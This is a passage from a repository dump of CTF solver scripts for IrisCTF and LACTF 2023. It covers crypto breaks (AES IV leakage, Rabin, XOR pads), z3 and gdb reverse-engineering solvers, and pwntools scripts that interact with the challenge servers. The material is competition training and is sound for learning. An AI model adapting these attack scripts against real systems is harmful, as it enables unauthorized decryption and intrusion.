| tmp_pt = cipher.decrypt(CT1) 12 | key = [] 13 | for i in range(16): 14 | key.append(tmp_pt[i]^knwon_pt[i]) 15 | 16 | cipher = AES.new(bytes(key), AES.MODE_CBC, IV2 ) 17 | print(cipher.decrypt(CT2)) -------------------------------------------------------------------------------- /solver/2023/irisctf/crypto/noncesandkeys/challenge_enc.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/irisctf/crypto/noncesandkeys/challenge_enc.sqlite3 -------------------------------------------------------------------------------- /solver/2023/irisctf/crypto/noncesandkeys/db.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/solver/2023/irisctf/crypto/noncesandkeys/db.sqlite3 -------------------------------------------------------------------------------- /solver/2023/irisctf/crypto/noncesandkeys/solver.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | 3 | key = bytes.fromhex("13371337133713371337133713371337") 4 | f = open("db.sqlite3","rb").read() 5 | g = open("challenge_enc.sqlite3","rb").read() 6 | 7 | known_pt = f[:16] 8 | known_ct = g[:16] 9 | cipher = AES.new(key, AES.MODE_ECB) 10 | ct_iv = [] 11 | for i in range(16): 12 | ct_iv.append(known_pt[i]^known_ct[i]) 13 | leaked_iv = cipher.decrypt(bytes(ct_iv)) 14 | print(leaked_iv) 15 | 16 | cipher = AES.new(key, AES.MODE_OFB, leaked_iv) 17 | pt = cipher.decrypt(g) 18 | out = open("dec.sqlite3","wb") 19 | out.write(pt) 20 | out.close() 21 | -------------------------------------------------------------------------------- /solver/2023/irisctf/crypto/notrsa/solver_notrsa.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | 3 | n = 21429933885346644587620272790089165813353259223649897308397918491861562279767580488441831451651834802520437234248670652477414296159324726172158330221397420877323921934377321483041598028053870169281419856238830264612049920637819183013812186448416408328958360799645342598727238977986741643705720539702955864527935398839069236768630867447760912744208154645904678859979378604386855741350220991958191408182147658532111413386776058224418484895056146180001830405844881486308594953615999140110712045286000170660686758188247928230655746746482354748673482506070246808187808961599576834080344066055446605664648340486804023919467 4 | e = 10788856448030235429585145974385410619185237539198378911887172763282204686697141640582780419040340318300048024100764883750608733331571719088729202796193207904701854848679412033514037149161609202467086017862616635522167577463675349103892366486246290794304652162107619408011548841664240624935414339021041162505899467159623692906986841033101688573177710503499081107294555688550493634416552587963816327790111808356639558596438537569271043190414208204773219496030644456745185896540608008662177117212000718802474957268532153146989410300300554162811564064457762004188326986236869603714437275058878379647196886872404148116134 5 | flag = 3954523654845598592730156937269688140867480061118457307435945875579028695730063528424973907208923014508950419982702682082417623843946231057553311028711409093751376287876799688357176816093484535703797332422565021382453879908968161161537921292725907853309522100738603080298951279637316809695591295752657105226749125868510570125512146397480808774515489938198191435285342823923715673372695893409325086032930406554421670815433958591841773705563688270739343539481283865883427560667086249616210745997056621098406247201301461721906304555526293017773805845093545204570993288514598261070097976786800172141678030841959348372097 6 | 7 | e_inv = pow(e,-1,n) 8 | pt = (flag*e_inv)%n 9 | print(long_to_bytes(pt)) -------------------------------------------------------------------------------- /solver/2023/irisctf/crypto/smart1/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import xor 2 | from z3 import * 3 | # I don't know how to make a good substitution box so I'll refer to AES. This way I'm not actually rolling my own crypto 4 | SBOX = [99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171, 118, 202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21, 4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39, 178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179, 41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57, 74, 76, 88, 207, 208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16, 255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, 144, 136, 70, 238, 184, 20, 222, 94, 11, 219, 224, 50, 58, 10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121, 231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198, 232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158, 225, 248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206, 85, 40, 223, 140, 161, 137, 13, 191, 230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22] 5 | 6 | TRANSPOSE = [[3, 1, 4, 5, 6, 7, 0, 2], 7 | [1, 5, 7, 3, 0, 6, 2, 4], 8 | [2, 7, 5, 4, 0, 6, 1, 3], 9 | [2, 0, 1, 6, 4, 3, 5, 7], 10 | [6, 5, 0, 3, 2, 4, 1, 7], 11 | [2, 0, 6, 1, 5, 7, 4, 3], 12 | [1, 6, 2, 5, 0, 7, 4, 3], 13 | [4, 5, 6, 1, 2, 3, 7, 0]] 14 | 15 | RR = [4, 2, 0, 6, 9, 3, 5, 7] 16 | 17 | def rr(c, n): 18 | n = n % 8 19 | return ((c << (8 - n)) | (c >> n)) & 0xff 20 | 21 | def rl(c, n): 22 | n = n % 8 23 | return ((c >> (8 - n)) | (c << n)) & 0xff 24 | 25 | import secrets 26 | # ROUNDS = 2 27 | ROUNDS = 2 28 | # MASK = secrets.token_bytes(8) 29 | MASK = bytes.fromhex("3d5e286c30e3af35") 30 | KEYLEN = 4 + ROUNDS * 4 31 | def encrypt(block, key): 32 | assert len(block) == 8 33 | assert len(key) == KEYLEN 34 | block = bytearray(block) 35 | 36 | for r in range(ROUNDS): 37 | # print("ct",block) 38 | block = bytearray(xor(block, key[r*4:(r+2)*4])) 39 | # print("ct bl",block) 40 | for i in range(8): 41 | block[i] = SBOX[block[i]] 42 | block[i] = rr(block[i], RR[i]) 43 | 44 | temp = bytearray(8) 45 | # print("ct_block bef",r,block) 46 | for i in range(8): 47 | for j in range(8): 48 | temp[j] |= ((block[i] >> TRANSPOSE[i][j]) & 1) << i 49 | # print("ct_block aft",r,temp) 50 | block = temp 51 | 52 | block = xor(block, MASK) 53 | return block 54 | 55 | def decrypt(block, key): 56 | assert len(block) == 8 57 | assert len(key) == KEYLEN 58 | block = bytearray(block) 59 | 60 | for r in range(ROUNDS-1,-1,-1): 61 | block = xor(block, MASK) 62 | tmp_block = [BitVec("x{}".format(i), 8) for i in range(8)] 63 | s = Solver() 64 | temp = [[] for _ in range(8)] 65 | for i in range(8): 66 | for j in range(8): 67 | temp[j].append(f"(((tmp_block[{i}] >> TRANSPOSE[{i}][{j}]) & 1) << {i})") 68 | fmt = "s.add({} == {})" 69 | for i in range(len(temp)): 70 | exec(fmt.format('|'.join(temp[i]),block[i])) 71 | s.check() 72 | model = s.model() 73 | new_block = [] 74 | for i in tmp_block: 75 | new_block.append(model[i].as_long()) 76 | for i in range(8): 77 | new_block[i] = rl(new_block[i], RR[i]) 78 | new_block[i] = SBOX.index(new_block[i]) 79 | block = bytearray(xor(new_block, key[r*4:(r+2)*4])) 80 | return block.decode() 81 | 82 | 83 | 84 | def ecb(pt, key): 85 | if len(pt) % 8 != 0: 86 | pt = pt.ljust(len(pt) + (8 - len(pt) % 8), b"\x00") 87 | 88 | out = b"" 89 | for i in range(0, len(pt), 8): 90 | out += encrypt(pt[i:i+8], key) 91 | return out 92 | 93 | def ecb_dec(ct, key): 94 | out = "" 95 | for i in range(0, len(ct), 8): 96 | out += decrypt(ct[i:i+8], key) 97 | return out 98 | 99 | # key = secrets.token_bytes(KEYLEN) 100 | key = bytes.fromhex("bc62c0b71ac3ebb55c01ca09") 101 | FLAG = b"irisctf{redacted}" 102 | print(f"MASK: {MASK.hex()}") 103 | print(f"key: {key.hex()}") 104 | ct = bytes.fromhex("efb6d7f1a2ddefdd04567cedb6d2a6c5fa8b96ad26f92fb1b0b55ad6a13838c6") 105 | print(ecb_dec(ct,key)) 106 | -------------------------------------------------------------------------------- /solver/2023/irisctf/re/python2/helper.py: -------------------------------------------------------------------------------- 1 | import string 2 | f = open("data.txt","r").read() 3 | 4 | fmt = "\\x{}" 5 | for i in string.printable: 6 | tmp = hex(ord(i))[2:].rjust(2,"0") 7 | print(fmt.format(tmp)) 8 | # f = f.replace(fmt.format(tmp),i) 9 | # print(f) -------------------------------------------------------------------------------- /solver/2023/irisctf/re/scoreboard/helper.py: -------------------------------------------------------------------------------- 1 | a = ['https://2023.irisc.tf/challenges?category=Networks', 'https://2023.irisc.tf/challenges?category=Binary+Exploitation', 'https://2023.irisc.tf/challenge?id=28', 'https://2023.irisc.tf/challenges?category=Binary+Exploitation', 'https://2023.irisc.tf/challenges?category=Radio+Frequency', 'https://2023.irisc.tf/challenges?category=Binary+Exploitation', 'https://2023.irisc.tf/challenges?category=Binary+Exploitation', 'https://2023.irisc.tf/challenges?category=Cryptography', 'https://2023.irisc.tf/challenges?category=Miscellaneous', 'https://2023.irisc.tf/challenges?category=Radio+Frequency', 'https://2023.irisc.tf/challenges?category=Web+Exploitation', 'https://2023.irisc.tf/challenge?id=28', 'https://2023.irisc.tf/challenges?category=Radio+Frequency', 'https://2023.irisc.tf/challenges?category=Networks', 'https://2023.irisc.tf/challenges?category=Radio+Frequency', 'https://2023.irisc.tf/challenges?category=Networks', 'https://2023.irisc.tf/challenges?category=Web+Exploitation', 'https://2023.irisc.tf/challenges?category=Radio+Frequency', 'https://2023.irisc.tf/challenges?category=Networks', 'https://2023.irisc.tf/challenges?category=Binary+Exploitation'] 2 | 3 | for i in a: 4 | print(i) -------------------------------------------------------------------------------- /solver/2023/irisctf/re/scoreboard/solver.py: -------------------------------------------------------------------------------- 1 | init = 23 2 | arr = [[2999, 'a i'],[10401, 'idc'],[11131, 'aty'],[9676, 'aey'],[12649, 'ost'],[10937, 'ary'],[11054, 'ase'],[10937, 'ary'],[11619, 'tea'],[9676, 'aey'],[11179, 'oe '],[12011, 'xem'],[11519, 'axy'],[2983, 'a y'],[2983, 'a y'],[10646, 'aoy'],[12655, 'nti'],[9987, 'ahe'],[9987, 'ahe'],[9288, 'aay'],[0,'monke'],[9288, 'aay'],[10875, 'cor'],[11236, 'ilh'],[9932, 'ySo'],[10295, 'egl'],[9496, 'ack'],[11554, 'oie'],[11009, 'ene'],[8215, 'lMe'],[5476, 'ILH'],[10937, 'ary'],[10811, 'ela'],[9848, 'eb2'],[4647, 'ED-'],[11729, 'azi'],[4609, 'i-t'],[10199, 'cha'],[3341, 'l s'],[3132, 'e d'],[3214, 'h r'],[3453, 'o c'],[3659, 'M1r'],[0,'invalid'],[3736, 'M2r'],[11236, 'ilh'],[10293, 'egn'],[10293, 'egn']] 3 | page = [i+1 for i in range(len(arr))] 4 | arr.append([11280, 'ep ']) #web 5 | arr.append([5112, 'o/i']) #login 6 | arr.append([11284, 'drt']) #profile 7 | arr.append([10102, 'eec']) #welcome 8 | arr.append([10100, 'eee']) #reverse 9 | arr.append([6685, 'aFi']) #radio freq 10 | arr.append([10688, 'ekw']) #networks 11 | arr.append([11241, 'ilc']) #misc 12 | arr.append([11554, 'oie']) #forensic 13 | arr.append([11630, 'rgp']) #crypto 14 | arr.append([3263, 'i a']) #binex 15 | page.append("web") 16 | page.append("login") 17 | page.append("profile") 18 | page.append("welcome") 19 | page.append("reverse") 20 | page.append("radio") 21 | page.append("netw") 22 | page.append("misc") 23 | page.append("forens") 24 | page.append("cryp") 25 | page.append("binex") 26 | 27 | target = [11079, 191606, 3268856, 55573815, 944761540, 16060949443, 273036143794, 4641614456128, 78907445765417, 1341426578018774, 22804251826330438, 387672281047629000, 6590428777809699685, 1356824780507595637, 4619277194919580898, 4740736018794679490, 6805536024671356146, 5013647977155751471, 11445039316809579231, 10098227648667334030] 28 | 29 | # print(tmp) 30 | 31 | # tmp = init*0x11 + arr[0][0] 32 | 33 | # tmp2 = tmp*0x11 + arr[0][0] 34 | # print(tmp2) 35 | val = 23 36 | key = "" 37 | orderr = [] 38 | track = [] 39 | for i in range(len(target)): 40 | found = False 41 | for k,j in enumerate(arr): 42 | tmp = val*0x11 + j[0] 43 | tmp &= 0xffffffffffffffff 44 | if(tmp==target[i]): 45 | orderr.append(page[k]) 46 | track.append(tmp) 47 | val = tmp 48 | key += j[1] 49 | found = True 50 | break 51 | if(found==False): 52 | print("???",i) 53 | print(track) 54 | print(key) 55 | print(orderr) 56 | print(len(orderr)) -------------------------------------------------------------------------------- /solver/2023/irisctf/web/babystretch/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from itertools import product 3 | 4 | def solver_captcha(io): 5 | io.recvuntil(b"python3 ") 6 | cmd = "python3 "+io.recvuntil(b"\n", drop=True).decode()#.strip().decode() 7 | code = process(["bash"]) 8 | code.sendline(cmd.encode()) 9 | code.recvuntil(b"\n") 10 | captcha = code.recvuntil(b"\n", drop=True) 11 | io.sendlineafter(b"?",captcha) 12 | 13 | p = remote("stretchy.chal.irisc.tf",10704) 14 | solver_captcha(p) 15 | 16 | list_char = "0123456789abcdef" 17 | p.recvuntil(b"> ") 18 | 19 | for i in product(list_char,repeat=2): 20 | payload = i[0]*64 + i[1]*8 21 | p.sendline(payload.encode()) 22 | tmp = p.recvn(2) 23 | if(tmp != b'> '): 24 | print(b"ir"+p.recvuntil(b"}")) 25 | break -------------------------------------------------------------------------------- /solver/2023/lactf/README.md: -------------------------------------------------------------------------------- 1 | | Category | Challenge 2 | | --- | --- | 3 | | Crypto | [chinese-lazy-theorem-1](crypto/chinese-lazy-theorem-1/) 4 | | Crypto | [chinese-lazy-theorem-2](crypto/chinese-lazy-theorem-2/) 5 | | Crypto | [guess-the-bit](crypto/guess-the-bit/) 6 | | Crypto | [one-more-time-pad](crypto/one-more-time-pad/) 7 | | Crypto | [ravin-cryptosystem](crypto/ravin-cryptosystem/) 8 | | RE | [ctfd-plus](re/ctfd-plus/) 9 | | RE | [finals-simulator](re/finals-simulator/) 10 | | RE | [universal](re/universal/) 11 | | RE | [switcheroo](re/switcheroo/) 12 | | RE | [snek](re/snek/) 13 | | Web | [85_reasons_why](web/85_reasons_why/) 14 | | Web | [uuid-hell](web/uuid-hell/) -------------------------------------------------------------------------------- /solver/2023/lactf/crypto/chinese-lazy-theorem-1/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from Crypto.Util.number import getPrime 3 | 4 | r = remote("lac.tf",31110) 5 | p = int(r.recvline().strip().decode()) 6 | q = int(r.recvline().strip().decode()) 7 | r.recvuntil(b">> ") 8 | r.sendline(b"1") 9 | r.recvuntil(b": ") 10 | r.sendline(str(p*q).encode()) 11 | target = r.recvline().strip() 12 | r.recvuntil(b">> ") 13 | r.sendline(b"2") 14 | r.sendline(target) 15 | r.interactive() -------------------------------------------------------------------------------- /solver/2023/lactf/crypto/chinese-lazy-theorem-2/solver.sage: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from sympy import * 3 | 4 | r = remote("lac.tf",int(31111)) 5 | p = int(r.recvline().strip().decode()) 6 | q = int(r.recvline().strip().decode()) 7 | p_prev = prevprime(p) 8 | q_prev = prevprime(q) 9 | r.recvuntil(b">> ") 10 | r.sendline(b"1") 11 | r.recvuntil(b": ") 12 | r.sendline(str(p_prev).encode()) 13 | target1 = int(r.recvline().strip()) 14 | r.recvuntil(b">> ") 15 | r.sendline(b"1") 16 | r.recvuntil(b": ") 17 | r.sendline(str(q_prev).encode()) 18 | target2 = int(r.recvline().strip()) 19 | 20 | mod = p_prev*q_prev 21 | init = crt([target1,target2],[p_prev,q_prev]) 22 | list_poss = [init] 23 | print(init) 24 | for i in range(29): 25 | list_poss.append(mod*(i+1) + init) 26 | r.recvuntil(b">> ") 27 | r.sendline(b"2") 28 | for i in range(30): 29 | print(i) 30 | r.recvuntil(b"here: ") 31 | r.sendline(str(list_poss[i]).encode()) 32 | resp = r.recvline() 33 | if(b"nope" not in resp): 34 | print(resp) 35 | break 36 | r.interactive() -------------------------------------------------------------------------------- /solver/2023/lactf/crypto/guess-the-bit/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import gmpy2 3 | 4 | r = remote("lac.tf",31190) 5 | for i in range(150): 6 | print(i) 7 | r.recvuntil(b"c = ") 8 | c = int(r.recvline().strip()) 9 | tmp = gmpy2.iroot(c,2)[1] 10 | r.recvuntil(b"guess? ") 11 | if(tmp): 12 | r.sendline(b"0") 13 | else: 14 | r.sendline(b"1") 15 | r.interactive() -------------------------------------------------------------------------------- /solver/2023/lactf/crypto/one-more-time-pad/solver.py: -------------------------------------------------------------------------------- 1 | a = bytes.fromhex("200e0d13461a055b4e592b0054543902462d1000042b045f1c407f18581b56194c150c13030f0a5110593606111c3e1f5e305e174571431e") 2 | pt = b"Long ago, the four nations lived together in harmony ..." 3 | 4 | flag = "" 5 | for i in range(len(a)): 6 | flag += chr(a[i]^pt[i%len(pt)]) 7 | print(flag) -------------------------------------------------------------------------------- /solver/2023/lactf/crypto/ravin-cryptosystem/solver.py: -------------------------------------------------------------------------------- 1 | import gmpy2 2 | from Crypto.Util.number import * 3 | 4 | def egcd(a, b): 5 | if a == 0: 6 | return (b, 0, 1) 7 | else: 8 | g, y, x = egcd(b % a, a) 9 | return (g, x - (b // a) * y, y) 10 | 11 | p = 861346721469213227608792923571 12 | q = 1157379696919172022755244871343 13 | n = p*q 14 | c = 375444934674551374382922129125976726571564022585495344128269 15 | e = 2**16 16 | 17 | g ,yp, yq = egcd(p,q) 18 | mp = pow(c,(p+1)//4,p) 19 | mq = pow(c,(q+1)//4,q) 20 | 21 | for i in range(15): 22 | mp = pow(mp,(p+1)//4,p) 23 | mq = pow(mq,(q+1)//4,q) 24 | 25 | r = (yp*p*mq + yq*q*mp) % n 26 | mr = n - r 27 | s = (yp*p*mq - yq*q*mp) % n 28 | ms = n - s 29 | for num in [r,mr,s,ms]: 30 | print(long_to_bytes(num)) 31 | -------------------------------------------------------------------------------- /solver/2023/lactf/re/ctfd-plus/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | static_val = "" 4 | class SolverEquation(gdb.Command): 5 | def __init__ (self): 6 | super (SolverEquation, self).__init__ ("solve-equation",gdb.COMMAND_OBSCURE) 7 | 8 | def invoke (self, arg, from_tty): 9 | global static_val 10 | gdb.execute("del") 11 | gdb.execute("b *0x55555555510b") 12 | gdb.execute("r < input.txt") 13 | for i in range(46): 14 | val = addr2num(gdb.selected_frame().read_register("al")) 15 | gdb.execute("set $al=0x41",to_string=True) 16 | static_val += chr(val) 17 | gdb.execute("c",to_string=True) 18 | print(static_val) 19 | 20 | def addr2num(addr): 21 | try: 22 | return int(addr)&0xff # Python 3 23 | except: 24 | return long(addr) # Python 2 25 | SolverEquation() -------------------------------------------------------------------------------- /solver/2023/lactf/re/finals-simulator/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r = remote("lac.tf",31132) 4 | r.recvuntil(b"? ") 5 | r.sendline(b"six") 6 | 7 | tmp = (561599850//42) - 88 8 | r.recvuntil(b"? ") 9 | r.sendline(str(tmp).encode()) 10 | 11 | r.recvuntil(b"? ") 12 | enc = [0xE,0x0C9,0x9D,0x0B8,0x26,0x83,0x26,0x41,0x74,0x0E9,0x26,0x0A5,0x83,0x94,0x0E,0x63,0x37,0x37,0x37] 13 | mod = 0xfd 14 | a_inv = pow(17,-1,mod) 15 | tmp = "" 16 | for i in enc: 17 | tmp += chr((i*a_inv)%mod) 18 | r.sendline(tmp.encode()) 19 | r.interactive() -------------------------------------------------------------------------------- /solver/2023/lactf/re/switcheroo/solver.py: -------------------------------------------------------------------------------- 1 | rol = lambda val, r_bits, max_bits: \ 2 | (val << r_bits%max_bits) & (2**max_bits-1) | \ 3 | ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits))) 4 | 5 | qword_40203C = [0x700010203040506, 0x3e04f4fb783cfc7e, 0x9d70813d04308703, 0x4a51a1f8093da74d, 0xc4950b2a88b02fc, 0x2d21d9262f0fd4b, 0x88e781beaabe46a9, 0x77090f0e85bb1994, 0x564eb824353f49fb, 0x7f0b7a9deb629b47, 0x13fb130146e18d1, 0xe650e17e4dd465ed, 0x81d36704803dabe7, 0x2ce80a373718c7a, 0x822c510930254873, 0x570837475070684e, 0x3bd734ec321014b5, 0x975e1ee37edd98b3, 0x158144feb60d4cfd, 0x88407c6cac154291, 0xfae192b920dfc1b, 0xfc0c676e7c762680, 0x4850b8d36d94ef27, 0x86466720d884da2, 0xac7e0453c14f48dc, 0x7c2568ad2461dfd8, 0x473b065dde911f08, 0x1eed1fd742e65871, 0x6c81edc3c1b82548, 0x3169f71b61802ff, 0xe4a7396792ae3fe0, 0x90cf08ac6b10b7ca, 0x4ca10931f081a0, 0xf53df18f89683b, 0x4242bcb1de8f49, 0x7e5900ceac84ca, 0x706f0fe8110ea4, 0x2278b42062504e, 0x2a05a95da52b9c, 0x4dc5d0b9df0e49, 0x6c3641e06cf0c4, 0x7947a68e374a6e, 0xd8d2632b336802, 0x13856c42fb5022e, 0x3b14db1a083918, 0xf8673ab12fe1bb, 0xa108b014ed1224, 0xb2892e6aef3b04, 0x22c3cd3180024d6, 0x23911aad0fc5f34, 0x20807c9714b4ee6, 0x71a331c09302327, 0x418062921a9d245, 0x51f16342b0f9253, 0x13b19bfda0ae97c, 0x712172535192f1e, 0x3322a0bc910d295, 0xc070fffa196394, 0x9ab072a84999dd, 0x4e82e174a1aaac, 0xaa5205419584b9, 0x678a2b8c1ee3d5, 0x45bcacc9d8e7d0, 0x3a19c384b0d4f9, 0x8b1960a582c51b, 0x4ec4506c2a2acd, 0x7473c8605786e1, 0x11316536bbab37f, 0xf0d247fdbdeef, 0xadf608a9de1e76, 0x9f540868cf82e3, 0x14f5fc312b801d, 0x106f14c43224fe, 0xb85bad5d8b37c5, 0xedce17848c990d, 0xccdc13df11bcc4, 0x20c2d6776a0559b, 0x20a1b64ea7521f7, 0x391d24d990be82, 0x7500719dd73ca8, 0xef2eadb2a82a37, 0x8ef10a40961460, 0x339a2cfe3f67a5, 0xe071306365879d, 0x6e6e3d2a75dcf0, 0x12e7254c18273f0, 0x4808adcd9b667f, 0x110801230ea6395, 0xfa98c7f1f1fc38, 0x10d400fe6fe7bd9, 0x479e150008b94d, 0xf980cf38134895, 0x2a0ffe7bcb5dac, 0x750b4b0fce9b99, 0xbd6efe79b37758, 0x7200e2431153628, 0x7caaf14032bc02, 0x23d011f618395bb, 0x53807834fe6f9e, 0x102303de88670c8, 0xf50c3ac708d8f8, 0xff5ef8a99d75bc, 0x2043a12100e517e, 0xe82d19d049d706, 0x2142631db624214, 0xa91363b0ffa60b, 0x858ea1137db2f9, 0x6f4ffa06b018ec, 0x10057e77680f034, 0x5a5ab88b8c7272, 0x11d196834081d82, 0x6dee0756faeaac, 0x1661e80c160078, 0xcca67a1a58c313, 0x1223683b81b13e8, 0x65cac20345d68d, 0x1031c1a6050ecdc, 0x13704ec972c1905, 0x4ec9e48b6c0b25, 0x55c40d12a5e1dd, 0xf0d4fcc420e40e, 0x9bb8c1998b27f3, 0xcac85d04041af6, 0x20541af898eba05, 0x2cb0263d671095, 0x23e42ffe7ac3643, 0x19f3624e096087, 0x26f8d3995aa788ec, 0x7472747368732e00, 0x65746f6e2e006261, 0x6975622e756e672e, 0x742e0064692d646c, 0x7461642e00747865, 0x61, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xb00000000, 0x200000007, 0x40012000000000, 0x12000000000, 0x2400000000, 0x0, 0x400000000, 0x0, 0x1e00000000, 0x600000001, 0x40100000000000, 0x100000000000, 0xc200000000, 0x0, 0x100000000, 0x0, 0x2400000000, 0x300000001, 0x40200000000000, 0x200000000000, 0x43c00000000, 0x0, 0x100000000, 0x0, 0x100000000, 0x3, 0x0, 0x243c00000000, 0x2a00000000, 0x0, 0x100000000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0] 6 | 7 | cnt = 0 8 | poss = [] 9 | flag = "" 10 | for cnt in range(64): 11 | poss_tmp = [] 12 | for i in range(0x20,0x7E+1): 13 | v3 = rol(qword_40203C[i],8,64) 14 | v4 = v3&0xff 15 | for j in range(v4): 16 | v3 = rol(v3,8,64) 17 | if(v3&0xff == cnt): 18 | poss_tmp.append(chr(i)) 19 | break 20 | poss.append(poss_tmp) 21 | for i in poss: 22 | if(len(i)==1): 23 | flag += i[0] 24 | print(flag) -------------------------------------------------------------------------------- /solver/2023/lactf/re/universal/solver.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | a1 = [BitVec("x{}".format(i), 8) for i in range(38)] 4 | s = Solver() 5 | s.add(((a1[34] ^ a1[23] * 7 ^ ~a1[36] + 13) & 0xFF) == 0xB6 ) 6 | s.add(((a1[37] ^ a1[10] * 7 ^ ~a1[21] + 13) & 0xFF) == 0xDF ) 7 | s.add(((a1[24] ^ a1[23] * 7 ^ ~a1[19] + 13) & 0xFF) == 0xCD ) 8 | s.add(((a1[25] ^ a1[13] * 7 ^ ~a1[23] + 13) & 0xFF) == 0x90 ) 9 | s.add(((a1[6] ^ a1[27] * 7 ^ ~a1[25] + 13) & 0xFF) == 0x8A ) 10 | s.add(((a1[4] ^ a1[32] * 7 ^ ~a1[22] + 13) & 0xFF) == 0xE3 ) 11 | s.add(((a1[25] ^ a1[19] * 7 ^ ~a1[1] + 13) & 0xFF) == 0x6B ) 12 | s.add(((a1[22] ^ a1[7] * 7 ^ ~a1[29] + 13) & 0xFF) == 0x55 ) 13 | s.add(((a1[15] ^ a1[10] * 7 ^ ~a1[20] + 13) & 0xFF) == 0xBC ) 14 | s.add(((a1[29] ^ a1[16] * 7 ^ ~a1[12] + 13) & 0xFF) == 0x58 ) 15 | s.add(((a1[35] ^ a1[4] * 7 ^ ~a1[33] + 13) & 0xFF) == 0x54 ) 16 | s.add(((a1[36] ^ a1[2] * 7 ^ ~a1[4] + 13) & 0xFF) == 0x67 ) 17 | s.add(((a1[26] ^ a1[3] * 7 ^ ~a1[1] + 13) & 0xFF) == 0xD8 ) 18 | s.add(((a1[12] ^ a1[6] * 7 ^ ~a1[18] + 13) & 0xFF) == 0xA5 ) 19 | s.add(((a1[12] ^ a1[28] * 7 ^ ~a1[36] + 13) & 0xFF) == 0x97 ) 20 | s.add(((a1[20] ^ a1[0] * 7 ^ ~a1[21] + 13) & 0xFF) == 0x65 ) 21 | s.add(((a1[27] ^ a1[36] * 7 ^ ~a1[14] + 13) & 0xFF) == 0xF8 ) 22 | s.add(((a1[35] ^ a1[2] * 7 ^ ~a1[19] + 13) & 0xFF) == 0x2C ) 23 | s.add(((a1[13] ^ a1[11] * 7 ^ ~a1[33] + 13) & 0xFF) == 0xF2 ) 24 | s.add(((a1[33] ^ a1[11] * 7 ^ ~a1[3] + 13) & 0xFF) == 0xEB ) 25 | s.add(((a1[31] ^ a1[37] * 7 ^ ~a1[29] + 13) & 0xFF) == 0xF8 ) 26 | s.add(((a1[1] ^ a1[33] * 7 ^ ~a1[31] + 13) & 0xFF) == 0x21 ) 27 | s.add(((a1[34] ^ a1[22] * 7 ^ ~a1[35] + 13) & 0xFF) == 0x54 ) 28 | s.add(((a1[36] ^ a1[16] * 7 ^ ~a1[4] + 13) & 0xFF) == 0x4B ) 29 | s.add(((a1[8] ^ a1[3] * 7 ^ ~a1[10] + 13) & 0xFF) == 0xD6 ) 30 | s.add(((a1[20] ^ a1[5] * 7 ^ ~a1[12] + 13) & 0xFF) == 0xC1 ) 31 | s.add(((a1[28] ^ a1[34] * 7 ^ ~a1[16] + 13) & 0xFF) == 0xD2 ) 32 | s.add(((a1[3] ^ a1[35] * 7 ^ ~a1[9] + 13) & 0xFF) == 0xCD ) 33 | s.add(((a1[27] ^ a1[22] * 7 ^ ~a1[2] + 13) & 0xFF) == 0x2E ) 34 | s.add(((a1[27] ^ a1[18] * 7 ^ ~a1[9] + 13) & 0xFF) == 0x36 ) 35 | s.add(((a1[3] ^ a1[29] * 7 ^ ~a1[22] + 13) & 0xFF) == 0x20 ) 36 | s.add(((a1[24] ^ a1[4] * 7 ^ ~a1[13] + 13) & 0xFF) == 0x63 ) 37 | s.add(((a1[22] ^ a1[16] * 7 ^ ~a1[13] + 13) & 0xFF) == 0x6C ) 38 | s.add(((a1[12] ^ a1[8] * 7 ^ ~a1[30] + 13) & 0xFF) == 0x75 ) 39 | s.add(((a1[25] ^ a1[27] * 7 ^ ~a1[35] + 13) & 0xFF) == 0x92 ) 40 | s.add(((a1[16] ^ a1[10] 